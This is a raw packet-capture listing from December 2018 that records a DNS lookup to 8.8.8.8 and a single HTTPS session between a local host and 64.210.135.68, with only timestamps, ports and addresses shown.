Dec 13, 2018 21:40:30.277715921 CET	63629	53	192.168.1.81	8.8.8.8
Dec 13, 2018 21:40:30.332106113 CET	53	63629	8.8.8.8	192.168.1.81
Dec 13, 2018 21:40:30.387339115 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:30.436299086 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:30.436351061 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:30.462104082 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:30.511431932 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:30.511461973 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:30.511483908 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:30.511502028 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:30.511600018 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:30.512588978 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:30.512686014 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:30.529426098 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:30.578761101 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:30.831568956 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:30.985994101 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.036360979 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036385059 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036411047 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036423922 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036449909 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036465883 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036488056 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.036511898 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036546946 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036592960 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036619902 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036642075 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036648035 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.036665916 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036689997 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036705017 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036719084 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036732912 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.036736965 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.036842108 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.036900043 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.037704945 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.085777998 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.085858107 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.085911036 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.085969925 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086018085 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086023092 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086076021 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086128950 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086146116 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086158037 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086230040 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086241007 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086277962 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086338997 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086359024 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086390018 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086438894 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086445093 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086482048 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086510897 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086524010 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086540937 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086570024 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086599112 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086601973 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086627960 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086657047 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086684942 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086699009 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086721897 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086745977 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086750984 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086780071 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086808920 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086811066 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086837053 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086865902 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086894035 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086900949 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.086922884 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086951017 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086978912 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.086986065 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.087007999 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.087073088 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.087400913 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.088862896 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.136375904 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136441946 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136507034 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136517048 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.136563063 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136635065 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136639118 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.136692047 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136746883 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136765957 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.136800051 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136832952 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136884928 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136899948 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.136940002 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.136996031 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137008905 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137051105 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137094975 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137120962 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137161016 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137191057 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137244940 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137248039 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137278080 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137306929 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137335062 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137362957 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137379885 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137392044 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137420893 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137449980 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137478113 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137480021 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137506962 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137536049 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137563944 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137592077 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137592077 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137620926 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137649059 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137677908 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137706041 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137707949 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137748957 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137778044 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137805939 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137823105 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137834072 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137876987 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137902021 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137931108 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.137959003 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.137974977 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138034105 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.138055086 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138101101 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138137102 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138153076 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.138174057 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138202906 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138231039 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138257027 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.138258934 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138288021 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138315916 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138339043 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138364077 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138374090 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.138394117 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138422966 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138451099 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138478994 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138485909 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.138504028 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.138569117 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.139029980 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.143156052 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.187602997 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187654972 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187686920 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187733889 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187762976 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187778950 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.187792063 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187840939 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187870026 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187897921 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187927008 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187933922 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.187956095 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.187992096 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188020945 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188038111 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188237906 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188317060 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188317060 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188376904 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188399076 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188448906 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188462973 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188509941 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188590050 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188596010 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188640118 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188669920 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188699007 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188721895 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188724041 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188751936 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188781977 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188816071 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188822031 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188846111 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188874006 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188910007 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188932896 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.188939095 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188967943 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.188996077 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.189022064 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.189024925 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.189054012 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.189081907 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.189110041 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.189137936 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.189145088 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.189167023 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.189238071 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.189625025 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.190380096 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.192387104 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.192435980 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.192472935 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.192507982 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.192538023 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.192563057 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.192564964 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.192744017 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.192792892 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.193130970 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.199161053 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.248879910 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.248922110 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.248945951 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.248966932 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.248991966 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249017000 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249037027 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249062061 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249074936 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249082088 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249119043 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249145031 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249166012 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249191046 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249209881 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249234915 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249248981 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249254942 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249281883 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249306917 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249326944 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249351978 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249377012 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249401093 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249425888 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249437094 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249447107 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249479055 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249504089 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249521017 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249530077 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249556065 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249581099 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249603987 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249605894 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249631882 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249658108 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249670982 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249684095 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249708891 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249735117 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249753952 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249759912 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249784946 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249809980 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249828100 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249835014 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249860048 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249885082 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249896049 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.249911070 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249936104 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249962091 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.249985933 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250008106 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250040054 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250041962 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250051022 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250073910 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250108004 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250132084 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250135899 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250158072 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250183105 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250185013 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250207901 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250232935 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250257969 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250282049 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250282049 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250307083 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250332117 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250355959 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250380993 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250395060 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250406027 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250430107 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250463963 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250483990 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250502110 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250545979 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250576019 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250583887 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250622988 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250647068 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250649929 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250674963 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250699997 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250725985 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250726938 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250750065 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250772953 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250797033 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250818968 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250822067 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250847101 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250869036 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250884056 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.250893116 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250917912 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250942945 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250977039 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.250976086 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251002073 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251027107 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251050949 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251061916 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251080990 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251106024 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251127005 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251151085 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251157999 CET	49211	443	192.168.1.81	64.210.135.68
